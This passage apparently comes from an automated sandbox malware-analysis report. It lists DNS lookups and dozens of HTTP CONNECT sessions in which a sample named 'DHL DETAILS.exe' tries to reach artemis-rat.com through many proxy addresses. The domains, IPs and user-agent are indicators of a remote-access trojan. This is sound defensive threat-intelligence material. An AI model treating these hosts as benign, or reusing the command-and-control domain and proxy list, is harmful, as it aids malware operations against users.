                                                                                    Mar 9, 2024 13:14:15.568917990 CET192.168.2.51.1.1.10x71a5Standard query (0)check.unblock-us.comA (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:16.403837919 CET192.168.2.51.1.1.10xcd9cStandard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:17.024239063 CET192.168.2.51.1.1.10x3a97Standard query (0)repository.gij.edu.ghA (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:35.197061062 CET192.168.2.51.1.1.10x6889Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:46.270912886 CET192.168.2.51.1.1.10x985Standard query (0)terminal7.veeblehosting.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 9, 2024 13:14:09.607131004 CET1.1.1.1192.168.2.50x645fNo error (0)github.com140.82.114.3A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:13.901326895 CET1.1.1.1192.168.2.50x68fNo error (0)artemis-rat.com172.67.140.87A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:13.901326895 CET1.1.1.1192.168.2.50x68fNo error (0)artemis-rat.com104.21.54.158A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:15.775017977 CET1.1.1.1192.168.2.50x71a5No error (0)check.unblock-us.comx.checkx.unblock-us.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:15.775017977 CET1.1.1.1192.168.2.50x71a5No error (0)x.checkx.unblock-us.comuu-wrong-check-537652193.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:15.775017977 CET1.1.1.1192.168.2.50x71a5No error (0)uu-wrong-check-537652193.us-east-1.elb.amazonaws.com52.54.249.241A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:15.775017977 CET1.1.1.1192.168.2.50x71a5No error (0)uu-wrong-check-537652193.us-east-1.elb.amazonaws.com54.156.164.130A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:17.407808065 CET1.1.1.1192.168.2.50xcd9cNo error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:17.526078939 CET1.1.1.1192.168.2.50x3a97No error (0)repository.gij.edu.gh102.223.20.217A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:28.451307058 CET1.1.1.1192.168.2.50x70aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:28.451307058 CET1.1.1.1192.168.2.50x70aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:35.351950884 CET1.1.1.1192.168.2.50x6889No error (0)github.com140.82.113.3A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:14:46.453988075 CET1.1.1.1192.168.2.50x985No error (0)terminal7.veeblehosting.com185.56.136.50A (IP address)IN (0x0001)false
                                                                                    Mar 9, 2024 13:16:50.163995981 CET1.1.1.1192.168.2.50xf1a1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 9, 2024 13:16:50.163995981 CET1.1.1.1192.168.2.50xf1a1No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549741104.16.104.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.828583002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:11.983196020 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549746104.25.167.88806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.836667061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:11.990716934 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.54973594.131.63.120583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.884046078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549758162.214.170.144375926352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.886903048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.348684072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549770172.67.181.20806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.894922018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.049248934 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.549775185.162.228.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.902190924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.056824923 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.549782104.25.64.27806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.919519901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.074014902 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.549766107.180.88.173357746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.930804014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.442439079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.067500114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.301857948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.833643913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.333451033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833762884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.549792104.22.50.220806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.935657024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.090004921 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.549710154.73.29.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.937556982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.614315987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.567480087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.631135941 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.54978491.134.140.160573206352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.967963934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.549722119.3.215.4188886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.982184887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.549779184.170.248.541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:11.999576092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.549783184.170.245.14841456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.004264116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.549825154.208.10.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.007875919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.172245026 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.54975061.129.2.21280806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.018908024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.724714994 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.54979324.249.199.1241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.040191889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.549855172.67.38.96806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.059258938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.213886976 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.549851142.54.239.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.066010952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.54980443.131.248.165156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.132630110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.549862165.227.104.122588396352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.137772083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.692455053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.411207914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
